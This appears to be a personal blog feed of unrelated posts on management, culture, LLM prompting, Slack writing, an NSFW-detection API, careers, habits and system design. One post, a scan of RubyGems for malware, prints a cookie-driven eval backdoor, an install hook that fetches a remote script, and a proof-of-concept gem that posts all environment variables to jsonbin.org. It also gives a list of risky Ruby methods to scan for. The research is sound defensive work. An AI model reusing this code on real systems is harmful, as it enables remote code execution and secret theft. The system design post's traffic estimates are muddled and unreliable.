Two key takeaways continue to resonate with me a week later: the importance of cultivating curiosity and allowing space for growth. These concepts have significantly influenced my approach to providing feedback, adding a fresh perspective to my managerial toolkit. Stay tuned as I delve into these transformative ideas in my latest blog article!
Historically, my 1:1 conversations went like this:
me: Hi, I noticed there was an issue in ___. can you tell me more about that? them: don’t worry I fixed it. me: thanks for fixing it. but how can we prevent this from happening again? them: I will do better next time. me: thats not the answer I was looking for. can you be more specific? them: I will be more careful. me: … me: let me just give you the answer. What if we try doing A, B, and C?
In retrospect, I acknowledge the limitations of my approach as I lacked sufficient information to confidently recommend A, B, and C. I now recognize the importance of cultivating curiosity about the problem at hand before imposing my own biases and assumptions. Moving forward, I aim to adopt a more inquisitive mindset to better understand and address challenges.
In problem-solving, guiding individuals with strategic questions proves more effective than managers simply offering personal advice. By delving into the root cause through thoughtful inquiry, people can tap into their creativity to discover solutions on their own. This approach fosters self-discovery and empowers individuals to navigate challenges autonomously.
]]>A few times per week, we have deep discussions about Eastern European culture, the Russian-Ukrainian war, and adjusting to American culture.
A popular holiday dish in Ukraine is “Помидоры С Майонезом и Сыром” or Snowy Tomato Slices. With smiling faces, they presented to me a tray of shredded cheese, tomatoes, and 2 tablespoons of white mayo.
Unfortunately, I didn’t take a photo, but they looked like this:
The flavor was exactly what you’d expect: cheese, mayonnaise, and tomato. They told me the history of this dish, rooted in the USSR’s failure, where limited ingredients were available. This reminded me of “Depression Meals” my grandparents told me about when they were growing up. My grandma would be sent to the store to make purchases alone because she was a “cute little girl,” and the shopkeepers wouldn’t say no to her, allowing her to borrow until the debt could be paid.
In U4U Facebook groups, people brutally attack young men seeking parole because they want them to stay to fight or participate in the local economy.
They told me that when the war first broke out, many Ukrainians felt sorry for the people that ran. They abandoned their friends, family, jobs, and personal possessions to pack up their bags and hike across the border to escape a war that would only last a few weeks.
Now, the Ukrainians that have stayed are upset that the expat Ukrainians have such happy and prosperous lives. The expats are earning more money, traveling, and living in safety. Back in Ukraine, life is dangerous and more difficult to obtain basic items.
These feelings of jealousy and unfairness are visible in the Facebook groups that support refugees and political bills. On Facebook, keyboard jockeys attack anyone trying to leave Ukraine or migrate to the USA. They look to see if they have already left Ukraine and claim that “there’s no need to sponsor this person because they are already in the EU.” They post news articles saying that if young men leave Ukraine, they will be arrested when they return or how Ukraine will cut off consulate and banking services to those that leave.
But I know the Ukrainian government is smarter than this. I think their current goal is to discourage people from leaving so they can operate their economy and fight their war, but once the war ends, they will be desperate to attract the talent (and money) that left Ukraine back. I suspect the government will flip and offer tax incentives to bring in the wealth that is currently generated by their expats.
America is a melting pot of tea cultures, but I learned that Ukraine, like India, is highly opinionated about teas but in unexpected ways.
When I visited the Grab office in Bangalore, India in October 2023, my team took me around to a few chai shops where they give you a shot glass of the most amazing boiling hot sweet milk tea I have ever had. I often ordered 2-3 different flavors so I could experience them all. During one of these lunches, my team member in a deadpan tone shared, “Kevin, you cannot have tea without milk. If there is no milk, then that is not tea.” I had a good chuckle and made a mental note to bring high-quality green tea on my next trip.
But in Ukraine, I heard the exact opposite: “How can you ruin tea by adding milk?”.
If you have any comments, send me an email at kevin@sparkstart.io
]]>In a professional environment, we expect coworkers and customers to behave professionally using professional language.
But across cultures, words and phrases can have different meeanings. A classic example is an interview with a British television host discussing a job opportunity in the USA.
Last year, I encountered this situation several times in real-life scenarios where a driver and passenger struggled to communicate during a pickup.
Passenger (who presumably learned English as their 2nd or 3rd language) would message the driver, intending them to send a message when the driver arrives at the pickup location:
passenger: massage me when you get here
To a native English speaker, this is unprofessional sexual harassment. Passengers should not request personal favors from their rideshare drivers
But maybe, this was just an unintentional misspelling.
But what if the passenger sends:
passenger: when you cum, massage me
Is this a high intentional sexual harassment or is this person uncomfortably bad at English? In the context of this being in a country with many non-native English speakers, the author is likely someone who learned English by listening and learned spelling by sounding out words. But if this was sent in a native speaking country, this would be considered Sexual Harassment.
Content moderation is hard.
In English-speaking countries like the USA, Canada, or England, these messages would likely be deemed offensive
In a language-diverse country like Singapore or Thailand, messages like this are just part of everyday business.
Even English teachers can teach the wrong pronunciation of words, as seen in this classic
If you have any comments, send me an email kevin@sparkstart.io
]]>Pealing back the onion, LLMs speak in tokens. Computers understand numbers and are really good at performing calculations with them, but too many numbers (and too many calculations) will have slow performance.
Enter tokens. Tokens are seemly random chunks of letters (sometimes english words, sometimes not) that are represented by a number. This compression from individual letters to chunks of letters reduces the number of calculations a computer needs to run in LLM, since one token may represent an entire word. OpenAI has a tokenizer playground for exploring how characters map to tokens.
Notice how ' back'
or ' onion'
are full tokens, but 'Pealing'
comprises 2 tokens ('P'
and 'ealing'
). An overly simple reason for this is OpenAI defined these tokens based on the most common in their dataset. Common words are given their own token and less common words are comprised of smaller tokens.
Prompts with large samples create many tokens. More tokens, means higher costs. LLMs can actually batch respond to prompts if you build your prompt correctly so that the same samples can be applied to the same requests.
The Experience + Slogan examples consist of 62 tokens. The actual prompt itself is 17 tokens, only 25% of the total prompt token count. If you have multiple prompts that have the same examples, then you can use the same examples for multiple prompts in a single prompt. This may sound confusing, but let me break it down.
With batch prompting, the model will respond to multiple prompts within a single prompt, minimizing the number of tokens that need to be created. Samples are created and defined separately from the results.
Pretend you are a food reviewer that only writes positive slogans about a restaurant.
Experience[1]: The pizza was too soggy
Experience[2]: The owner gave my son a toy with his hamburger
Slogan[1]: Pizza is popular
Slogan[2]: Best family friendly hamburger joint
Experience[3]: The spaghetti sauce paired perfectly with the home made pasta
Experience[4]: The sushi rolls are creative, the artistry is wonderful and everything was absolutely delicious!
Experience[5]: I like how they have both an extensive burger and breakfast menu - hence the Bs! They kept my coffee going and even catered to a number of adjustments for my friends - now that's service!
(153 tokens)
Slogan[3]: Perfectly paired pasta, sauce and all!
Slogan[4]: Creative sushi, artistry on point, flavors divine!
Slogan[5]: Bs for breakfast, burgers, and beyond! Exceptional service and customization.
GPT perfectly associated the experience number with the slogan (without leaking any information across experiences). The batch prompt used 153 tokens, whereas single prompts used 66, 73, and 97 tokens respectively (totaling 236 tokens).
With batch prompting using this example, there is a 64% token reduction and cost savings, while achieving similar accuracy.
This technique reduces LLM costs by 50%+ at minimal accuracy degrdation. This technique is perfect for processing millinos of prompts for summarization or entity extraction, but at a low cost.
A word of warning: this technique isn’t free. There is ~3% decline in accuracy comparing a batch size of 4 to a single prompt, with an even sharper drop of accuracy from batch sizes of 4 to batch sizes of 6.
As many know or suspect, communication with a 12-hour delay is not efficient. Miscommunications or lack of communication adds at least a 1-day delay (more for weekends and holidays), therefore thoughtful and intentional communication is critical for career success.
In the early days of my career, people wouldn’t answer my questions, not trust what I was sharing, or take forever to respond. From these experiences, I developed the following writing style for Slack to mitigate communication gaps and speed up my project deliveries.
I want to share 5 Slack writing techniques that I have learned when communicating with my peers in a 12+ hour timezone and at the very end, I share my writing template for how I structure most of my async communication (email or slack).
Follow-up questions instantly delay projects by +1 days. Know your audience and provide the context they need to answer your questions.
Avoid acronyms, because you never know if they know them.
Define proper nouns, that they might not be familiar with. For example, “The Obi-Wan service has high latency” is bad, b/c they might not know what Obi-Wan is.
When your peer wakes up at 6am, they do not want to see an essay-length slack message. The message will be marked as “read” with the intention of responding later, but quickly forgotten.
Remove filler words or phrases. (For example, “By the way…”, “I was wondering about…”)
Speak with confidence. “I think that I can possibly consider agreeing” 👉 🗑️. Don’t share weak decisions or opinions. Either agree, or disagree.
Avoid phrases like, “I think…” b/c everything you write is what you think. no need to double explain.
Offer a summary. If the message must be long, include a summary to help the reader prioritize when they need to respond.
Do your homework. If you’re not confident about an assumption, do your own research before stating facts or asking for help. If the reader find a hole in your premise, then you lost a day regrouping.
Cite your sources. If you weren’t confident about a key fact, perhaps your reader is too. Link to the documentation relevant to your slack message. This serves two purposes: so the reader can dive deeper if they want, and so you can find your sources later if you need to dive deeper yourself.
Provide explicit, clear answers to questions. If someone asks you a Yes or No question. Respond with yes or no. Don’t make the reader guess.
Clearly state what you need from them. Often my peers will intertwine questions in context or not be explicit with their needs. I’ve seen people (intentionally or unintentionally) avoid answering critical questions, b/c they “missed” them.
Provide the reader enough context to meet your goals.
Public topics should be in public channels and private topics should be in private DMs. Almost every private conversation about a project needs input from other people. Having these conversations in open channels will help future people joining the project have access to earlier discussions. Open channels are also searchable.
I always move project conversations from private DMs to public channels, b/c of the time, other people will need to be involved.
greeting: Hi team,
TLDR: If my message gets long, I will include a 1-line Too Long; Didn’t Read to help the reader decide if they actually want to read my message now if it can wait until later.
Context and the problem: Here I provide context to the problem, assuming they have no idea what I am talking about. I do not want them to ask follow-up questions, because those add delays. I do not use acronyms.
end: A clear, ordered list of questions, sorted to match the context.
- Question 1
- Question 2
Example
Hi team,
The latency graph (dasboard link) to our messaging service (code link) from your service (client code link) increased > 15% week over week. We have not made any deployments in 2 weeks (deployment log link) or configuration changes > (configuration dashboard link).
- Has anything changed with the amount of traffic or size of the payload from your system?
- Is there someone that can help me investigate this?
In this example, I assume whoever is on-call knows (almost) nothing about their teams’ integration with my team’s servers.
If you have more tips you want to share, send me an email kevin@sparkstart.io
]]>I built a low-cost NSFW API hosted on Digital Ocean’s new App Platform.
I added Bumble’s Private Detector to the model host so both models can be leveraged. Both models can be hosted on FlyIO’s low-cost servers for about $25/mo.
Making predictions based on images involves two basic steps: training the data and then processing the prediction. How to train the ML model can be found in the Github repo: GantMan/nsfw_model.
The prediction API first fetches the remote image and saves the bytes to disk. Persisting to disk simplifies communicating with the ML library since the library accepts a file path, not a byte stream.
Then the image is resized to fit the dimensions of the ML model. The ML algorithm needs to compare apples to apples and so resizing to match the same size of the image training data is critical for developing the right comparison.
The resized image is categorized using the attached model. This provides a float score for each of the categories: drawings, hentai, neutral, porn, and sexy. The higher the score, the more likely the image is in this category.
Once the prediction is created, we clean up after ourselves by deleting the image from the disk and return the response.
On the client, these scores are converted to 3 states:
The unknown state will need to be human-reviewed and bucketed into one of the “definite” categories. For my first pass, I use a combination of “sexy” and “porn” scores to determine if it’s “definitely adult content” and I look at the “neutral” score to know if the image is “Definitely safe Content.”
Self-hosting and using only takes a couple of hours since the API is so simple and Digital Ocean’s App Platform allows for Heroku-like deployment.
You will need to develop your client, but there are only 2 HTTP endpoints you would need to implement: POST /predict
and GET /health
The service accepts a URL of an image to fetch and process. Instead of passing the image bytes directly, the URL reduces the workload on the client and avoids the overhead of base64 encoding images for the transfer (base64 has a ~33% worse space overhead).
$curl -XPOST 'http://localhost:8080/predict?url=https://www.kcoleman.me/images/hills.jpg'
{"drawings":0.11510543525218964,"hentai":0.024719053879380226,"neutral":0.803202748298645,"porn":0.0172234196215868,"sexy":0.039749305695295334}
The health endpoint helps you monitor if the service is running without needing to process an image.
$ curl 'http://localhost:8080/health'
{"status":"ok"}
Unfortunately, Heroku limits the slug size to 500MB. After compilation, the flask app is 635MB (due to needing to load the ML model (250MB) and PyTorch. It is impossible to host ML services on Heroku.
The $10/mo Digital Ocean 1GB/1vCPU App Platform hosts this project perfectly. The first deployment takes 20+ minutes, but it will eventually startup. There is a health check endpoint at /health
where you can verify the service is running.
This machine takes about 600ms per request and has 2 workers, so can take about 0.8 requests per second or 72,000 images per day. Not too shabby for a $10/mo ML microservice.
Sample App config
name: nsfw-flask
region: nyc
services:
- environment_slug: python
github:
branch: master
deploy_on_push: true
repo: KevinColemanInc/NSFW-FLASK
health_check:
http_path: /health
http_port: 8080
instance_count: 1
instance_size_slug: basic-s
name: nsfw-flask
routes:
- path: /
run_command: gunicorn --worker-tmp-dir /dev/shm app:app
source_dir: /
The flask service is a wrapper for the GantMan/nsfw_model. They performed the heavy lift of developing the ML model and the prediction code.
You can play with a web host version of the model on nsfwjs.com since we use the same model.
]]>Tech is eating the world. Tech companies will be the dominant hiring force for at least the next 50 years and they require a variety of programming and non-programming skills to keep their well-oiled machine running.
Whether you just finished a boot camp and you are looking for a new job or you know nothing, but want to
Please note that the compensation numbers are estimates. There are very wide varieties of pay between these roles depending on your geographic location.
Quality Assurance (QA) test pre-released apps. QAs try their very hardest to find weird edge cases that will break the app before the users find them. An example bug a QA might find is they could try putting words instead of a number in a text box. The engineer authoring the application may forget to validate the user-submitted text. If a user inputs text instead of a number, the website may crash. The QA would flag the error and ask the engineer to display a human-friendly message asking the user to use a number instead of text.
A typical day as a QA is you will get instructions to test out a feature. You will try various inputs to break the app and work with the engineers to correct any problems that arise. You are expected to write reports or short JIRA or Zendesk tickets describing how to reproduce the issue.
It is very common for junior software engineers to start their careers as QAs because they have an understanding of how computers work to know how to find problems. This is a great job to get your foot into the door at a company before transferring into a more traditional software engineering role.
Data Analysts (DA) help product managers, engineers, and business people answer questions about the company’s data. For example, a product manager might want to know “how many users logged into the website this week?”. Data Analysts will use SQL to query various data stores to collect this information. They may even leverage Machine Learning to find the answers to their questions.
These roles are great because unlike engineering roles, there are no on-call duties. If the website is failing, they can continue to sleep through the night :), but the next day DAs will need to report how many people were impacted by the failure.
Candidates must demonstrate writing SQL, with an understanding of JOIN and WHERE clauses. If you’re interested in learning SQL, I love the free Khan Academy Class that will guide you through the basics. For interviews, be prepared to answer questions about joining tables, basic statistics (e.g. how do you calculate the medium).
Product managers (PMs) listen. PMs gather information from Data Analysts, Users, Engineers, sales, and business verticles to identify and prioritize problems that the engineers will solve. For example, a user may ask the website to allow them to import their data via a CSV file. The product manager will talk with the engineers to determine how long creating the feature will take and the PM will talk with other users and stakeholders to determine how important this problem is. Sometimes the engineers may say, “This feature will take 4 months to build” and the PM may decide this is not worth the effort.
PMs, tired of PMing, often switch to becoming Software Engineers and Software Engineers, often switch to become PMs. Technical PMs are great because they understand the limitations of software and can analyze data to find the lowest hanging fruit.
Product manager’s roles vary from company to company, because much of their work is defined by the company’s work culture. Read through the job description and make modifications to your CV/Resume as necessary to put your best foot forward when applying to these roles.
Technical Product Managers are similar to Product Managers, but they work much closer with engineers than sales or other business verticals. A TPM might be asked to analyze a 3rd party for integration, perform competitive analysis, or assist engineers with developing engineering specs that meet the requirements of product managers.
Many software engineers start their careers as TPMs and transition to software engineering for the higher pay and larger direct impact on the users.
As a junior software engineer, your job will primarily to implementing features that senior engineers define. For example, they may ask you to “make a JSON rest API for this MySQL table”.
Junior Software engineers take the most skill to learn. At large companies, junior roles are primarily filled by college students and recent grads with Engineer or CS degrees, so it can be challenging to break into this. Startups and consulting agencies have the lowest hiring bar because they struggle the most to have applicants. Startups typically don’t have enough money to compete with the larger companies, so they are great places to launch your software engineering career.
You should also consider joining Software Engineering consulting firms, especially if you leave in Asia or Eastern Europe. Typically, these companies are also desperate for talent as projects ramp up and customers need them to deliver products quickly. Consulting companies struggle to hire talent for similar reasons as startups, but also the work is less consistent. I helped a friend of mine land his first programming job as a part-time software engineer at a consulting company I worked at. 3 years later, he was working full time at Facebook earning more than I do!
Open-source packages are an amazing, but also a scary gift. When you install and execute foreign code, you’re trusting that the proprietors are good citizens that aggressively audit code changes. On my dev laptop, I have unencrypted bitcoin wallets and API keys hardcoded in environment variables that any program would have access to when run.
Package hosts make it difficult for devs to audit the hosted code because there is no tight coupling between code-viewing platforms like Github and the compressed code that is hosted on the package tool. The code shared on Github could be completely different than the code hosted on the package server since the servers are not connected. The only true way to audit the library you’re using is to fetch, unpack, and inspect the millions of lines yourself.
Ruby’s monkey patching and bundler tooling leave apps vulnerable to a variety of remote code execution attacks. I downloaded the latest version of every gem hosted on RubyGems.org to find what malware could be lying hidden in the open. I search 2,500,000 ruby files with golang to search for RCE, unexpected network requests, and more.
During the bundle install
process, code is executed from the gem if there is a extconf.rb
file. extconf.rb
by design contains instructions on how to build c libraries when installing the gem. Some gems are written in a lower-level language to take advantage of the better performance. An example is the fast_blank wherein c-land, which quickly determines if a string value is blank.
Monkey patching first-class types like String
or Object
can both improve the use-ability of these objects as well as expose vulnerabilities. In 2019, someone monkey patched the Rake::Sendfile
to add their middleware to rails code that installed a bad version of bootstrap-saas
.
begin
require 'rack/sendfile'
if Rails.env.production?
Rack::Sendfile.tap do |r|
r.send :alias_method, :c, :call
r.send(:define_method, :call) do |e|
begin
x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
eval(x) if x
rescue Exception
end
c(e)
end
end
end
rescue Exception
nil
end
This code would allow the attacker to run arbitrary code passed in via the cookie. The code could share the machine’s configuration variables and database connections.
The eval
method executes a string as if it was ruby code (details). Most gems or rails applications should never use this cmd because it is too easy for abuse. Allowing a user-submitted string to be evaluated would let any user run code on your production machine and thus grant full access to your internal network. Scary stuff.
The send
method acts similar to eval
but it can be run in an object. For example, "kitten".send("capitalize")
would capitalize “Kitten”. If a user-defined variable is given, instead of a hardcoded string, then potentially arbitrary ruby code could be defined and executed. Most gems should never use the send
or eval
methods.
Hackers can also open network requests to a server, sending private information about the machine installing the gem or running it. In ruby, you should verify that Net
class is not being unexpectedly used to call a command and control center.
Most gems also should not be accessing the ENV
object. Often developers store their private keys as environment variables instead of hardcoding them in code.
List of objects and methods to check:
ENV
eval
send
exec
\
`fork
spawn
syscall
system
Rubygems.org offers a data dump of all of the gems on rubygems with how much they were downloaded. For the sake of speed and bandwidth limitations, I will only fetch the top 100,000 for analysis.
I was a bit lazy and used a Gemfile
and bundle install -j 8
to fetch the latest version of the 100,000 most popular ruby gems of 2020-11-15.
With the raw source code dumped into a local directory, I can use a mix of ruby and grep
to search all of the gems for suspicious code. Unfortunately, I wasn’t able to fully automate the research process. My script searched for suspicious method calls, flagged the line along with the package name, and then I verified that each suspicious line was a false positive. For example, a ruby gem that adds a CSS framework should never use eval
, but they may use it in their test cases. In general, it’s never good to use eval
, using it in a test case that isn’t run on production should be safe.
The git repo powering this exploration can be found at https://github.com/KevinColemanInc/gem-sec-research.
Highlights! Using sensitive ruby code isn’t inherently bad, so I’m not able to understand the intention of 200,000 ruby gems to determine if calling eval
is malicious or expected. The much lower hanging fruit is what gems attack the server or developers box via extconf.rb
. My gemsploit
gem sends all of the ENV variables up to a server
lwes_ext, downloaded 69,122 times, when installed, downloads a script from a website and executes it. The script is no longer available, so it just crashes. Since the project and website aren’t maintained, I worry that a malicious actor could buy the domain if it was allowed to expire and swap in a more nefarious script.
# uwsgi-2.0.19/ext/uwsgi/extconf.rb
require 'net/http'
Net::HTTP.start("uwsgi.it") do |http|
resp = http.get("/install")
open("install.sh", "wb") do |file|
file.write(resp.body)
end
end
uwsgi is doing the same as lwes_ext, executing arbitrary code downloaded from the internet. The script behind this 404s now, so who knows what it was doing before?
This failure is intentional. You probably meant to install and run http-cookie
In httpcookie, a kind-hearted developer trying to prevent people from falling pre to typosquatting created a gem called httpcookie
that all it does is fail on install. It warns the developer they mistyped the gem name and they need to go install the correct gem.
I wrote the gemsploit gem to explore what can happen with malicious code.
uri = URI.parse("https://jsonbin.org/kevincolemaninc/#{SecureRandom.uuid}")
request = Net::HTTP::Post.new(uri)
request["Authorization"] = "token " # withheld
request.body = JSON.dump(ENV.to_h)
By installing this gem, all of your ENV variables are posted up to jsonbin.org for public viewing. My development machine had AWS secrets, bitcoin wallet secrets, and other hard-coded passwords. I have since moved to use dotenv to silo my env secret keys, but this still doesn’t protect gems from scanning your hard drive for unprotected BTC wallets.
[EN] How to take over a Ruby gem / Maciej Mensfeld @maciejmensfeld
This conference talk was the inspiration for this exploration.
This is a really neat project that makes it easy to compare changes across versions of gems. You still have to take the time to audit the changes, but hopefully, with their clean interface, it does not take you too long.
You can find the source code for lib-scanner on github. The project is (mostly) written in golang with an in-depth readme file explaining how the code pipeline works.
I’d love to bring this scanner to other languages like golang or python. Please shoot me an email (kevin at sparkstart.io) if you’re interested in collaborating!
]]>I started applying engineering and psychological techniques to maximize my performance in life in 2018 because as the end of the year approached, I hadn’t yet accomplished my 2019 goals. I lacked focus and accountability. In 5 months, I was able to perform 18 pullups (starting 6 pullups), reduced alcohol consumption to 2x per month, and bench-pressed 180 lbs (starting 135lb). #PatsSelfOnBack.
My biggest obstacle was cutting out the wasted time in my life. I’d spend hours browsing Reddit because I was confused as to what I should do to achieve my goal. When I had a lazy Sunday afternoon, instead of taking action, I’d hop on the dopamine treadmill of Netflix. There was too much friction between determining what I should be doing and doing it.
Enter Todoist. Todoist allows me to manage what I need to get done today. I put my entire life in there. My list was:
Todoist had fresh content for me every day when I mixed habit actions (e.g. brush teeth) and irregular actions (book flights for an upcoming trip). Unlike habit tracking apps that have the same boring content every day.
Mario Tomic of Fitness Mastery recommends using a calendar to keep focused. This is a great alternative for people that want even more structure. You can assign a task to specific. Personally, my life is organic. I don’t always have the same set times available to do certain tasks. Any action someone asks me to do, it goes onto my action list for me to complete later. I no longer default to Netflix when I am unsure how to spend my mornings or afternoon.
Todoist is for managing actions, not goals. Actions are short (preferably done in 45 min or less) and have a clear metric for success. If an action will take you longer than 45 min to complete, consider breaking it up into smaller actions. Large actions require large blocks of time and large blocks of time are so-so rare. The large action of “clean house” can be broken down into smaller actions like “clean bedroom”, “clean kitchen”, “do the dishes”, and “vacuum bedroom” that will be much more digestible and easier to accomplish.
Goals are accomplishments that have a clear metric for success but are too big to be considered an action. Example goals might be to “benchpress 180lbs” or “write 1,000,000 lines of code this year”. Goals do not belong on your daily Todoist list. But goals should be captured non-time-defined projects (e.g. don’t set deadline). If goals are added to your daily list, they will stay on your list, incomplete for months and months without actually providing much value. Your goal might be to bench press 180lbs and your better daily action would be to workout.
After you enter all of your daily and irregular action items into Todoist, you need to build the habit of checking and completing the actions you need to do each day. This is much easier to do than a typical habit tracking app because the content in your list is dynamic and irregular. Yes, you will need to check off “brush teeth” every day, but you will have other actions like “email boss the TPS Reports” that will keep you from being bored.
Like Pavlov’s dogs, to develop a habit, humans need to be rewarded when completing an action. Developing a healthy reward system for using Todoist and completing actions will trigger a dopamine kick that will bring you back to the app to do more actions. These rewards must happen immediately after the action is completed and are healthy (Don’t go eat candy after a hard workout in the gym).
The best rewards you can give yourself are appreciating that you accomplished the action. Maybe the action was to file your taxes. Super boring action. How can that be rewarding? Love the experience of checking things off on your list. Each time I accomplish an action, I know I am one step closer to ending my day with an empty list. It feels good to know I am progressing in life.
The reward should be that you completed the action and not that the action was “successful”. Take dieting, for example, you might have an action of “eat an apple” every day to make you feel more full and help you lose weight. Be happy when you stay on track and eat that apple every day and not that your weight has decreased.
If you can’t complete your list, that doesn’t mean you should do nothing. Many people get stuck in the mindset of “If I don’t have time to complete an action, I won’t do it at all.” Sometimes doing 50% is better than 0%.
Let’s say your goal is to be a successful blogger. Your weekly action is to write a blog article once per week. By the end of the week, you’re tired and you don’t have time to write a complete article. Instead of writing what you can, you do nothing and tell yourself, “better luck next week.”
A much better mindset is to be ok with partial credit. Write what you can and you can finish it later next week. Someone that writes every week, even if it is just a few sentences will be more successful than someone that writes 3-4 articles and stops
After you develop the habit of checking Todoist and using it regularly, you will start to see certain actions being stuck in your overdue queue or maybe you continuously. This situation requires introspection.
Your body and mind don’t understand “weekends”. It only knows days. Take breaks, but try to maintain your foundational habits no matter what you are doing in life. Even on vacation, I will exercise every day or review study materials for classwork.
If this vibes with you, let me know.
]]>System design interviews are dynamic process that are more art that science. Your interviewer will be looking for specific answers and so spending too much time in one particular area might me the interviewer won’t be able to be able to learn what they need to learn. Pase yourself and ask clarifying questions like, “Do you want me to dive into this more or should we move onto the next step?
Many system design questions want you to tell a story, much like other parts of the interview. System design is about solving micro-problems and blasting them out ahead.
Clarify ambiguities and determine system end-goals to assess the exact scope of the problem or task at hand.
to clarify how data will flow between different system components and enable better data partitioning and management.
Imagine its you and your dog building this solution on the weekend. Every website (Dropbox, Facebook, Salesforce) started small and grew as bottle necks were identified and resolved. Design a system that meets all of the requirements, but in its most simplest form, even if your system runs on one machine. If you’re interviewing at Amazon this will demonstrate [Insert LP].
What are you
Estimate how much traffic you need to support and how many machines you will need to handle that traffic.
Memorize these estimations:
100 Million requests per month = ~40 Queries per second (QPS) Number of corse = QPS * Request time (100ms)
For example, lets estimate the number of machines we need to support 1 Billion users making 20 requests per day.
50 million users * 20 requests per day * 31 = 620 million requests per month. 62 * 40 QPS = ~240 QPS # just memorize that 10m request per mo = ~40 qps 240 * 0.1s per request = 24 cores
You will need at least 24 cores to process fully process the request, but additional cors necessary in-case of failure.
https://gist.github.com/greenido/56495b7d4bec8eeb235caaec42cf007b
Pretend its you, your dog 🐕, working out of your garage, building this solution on weekends. How would you design this system on a budget? The goal of this is establish basic infrastructure in place that we will scale later.
Identify who is going to use it, how are they going to use it, and when are they going to use it?
2) High level architecture design (Abstract design)
3) Component Design
4) Understanding Bottlenecks
5) Scaling your abstract design
6) Availability & Reliability
1) Concurrency
2) Networking
3) Abstraction
4) Real-World Performance
5) Estimation
6) Availability & Reliability
Links
How to rock a systems design interview
Introduction to Architecting Systems for Scale
Scalable System Design Patterns
Scalable Web Architecture and Distributed Systems
What is the best way to design a web site to be highly scalable?
]]>